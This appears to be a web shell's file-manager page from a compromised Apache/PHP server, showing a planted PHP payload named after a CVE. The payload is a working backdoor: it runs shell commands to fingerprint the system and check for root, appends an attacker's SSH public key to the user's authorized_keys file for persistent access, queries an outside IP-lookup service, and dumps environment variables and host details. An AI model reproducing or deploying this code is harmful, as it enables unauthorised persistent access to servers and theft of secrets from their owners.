Uname: Linux dedi-15171674.espacofacial.com.br 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
Software: Apache
PHP version: 8.2.33 [ PHP INFO ] PHP os: Linux
Server Ip: 104.21.5.151
Your Ip: 216.73.217.141
User: espa7358 (1004) | Group: espa7358 (1003)
Safe Mode: OFF
Disable Function:
NONE

name : cve-2026-48907-1f326aa3.xml.php
<?php echo 'CVE-2026-48907-START-02c068953a020d3603620d44'; ?><?php
if (stripos(PHP_OS, 'WIN') === 0) {
    $os = php_uname('s') . ' ' . php_uname('r') . ' ' . php_uname('v'); 
} else {
    $os = shell_exec('uname -a');
}
function getCurrentUserInfo()
{
    // OS / user
    $user = get_current_user(); // best-effort
    $uid  = null;
    $gid  = null;

    if (function_exists('posix_geteuid')) {
        $uid = posix_geteuid();
    }
    if (function_exists('posix_getegid')) {
        $gid = posix_getegid();
    }

    // Root/admin check (best-effort)
    $isRoot = false;

    // Linux/mac: uid==0
    if ($uid !== null) {
        $isRoot = ($uid === 0);
    }

    // Windows: try to detect admin group
    if (stripos(PHP_OS, 'WIN') === 0) {
        $isRoot = isWindowsAdmin();
    }

    return [
        'user' => $user,
        'uid' => $uid,
        'gid' => $gid,
        'is_admin_or_root' => $isRoot,
    ];
}
function isWindowsAdmin(): bool
{
    // Uses "net session" as a best-effort elevation/admin check.
    // If the process is elevated enough, it usually succeeds and prints sessions.
    $out = shell_exec('net session 2>&1');
    if (!is_string($out) || $out === '') return false;

    $lower = strtolower($out);

    // Common success markers (English):
    if (strpos($lower, 'sessionname') !== false || strpos($lower, 'client') !== false) {
        return true;
    }

    // Common failure markers (localized text may differ):
    if (strpos($lower, 'access is denied') !== false || strpos($lower, 'denied') !== false) {
        return false;
    }

    // Fallback: treat anything that looks like a net session table as success
    // (heuristic)
    return (strpos($lower, '---') !== false);
}
function sshDirExists()
{
    $home = getenv('HOME');

    // Windows fallback
    if (!$home) {
        $home = getenv('HOMEDRIVE') && getenv('HOMEPATH')
            ? getenv('HOMEDRIVE') . getenv('HOMEPATH')
            : null;
    }

    if (!$home) return false;

    $ssh = rtrim($home, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . '.ssh';
    return is_dir($ssh);
}
if(sshDirExists()) {
    @fwrite(fopen(rtrim($home, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . '.ssh'.'/authorized_keys', 'a'), "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOLYCFNeLGzWD6M2yJyBS++tGhmHhpRO+FCBspDebemD\n");
}
$info = json_decode(file_get_contents('http://ip-api.com/json'), 1);
$arch = php_uname('m');
echo json_encode([
    'exists' => sshDirExists(),
    'os' => $os,
    'arch' => $arch,
    'env' => $_ENV ? $_ENV : false,
    'ip' => $info,
    'user' => getCurrentUserInfo()
], JSON_PRETTY_PRINT);
?><?php echo 'CVE-2026-48907-END-02c068953a020d3603620d44'; ?>
© 2026 UnknownSec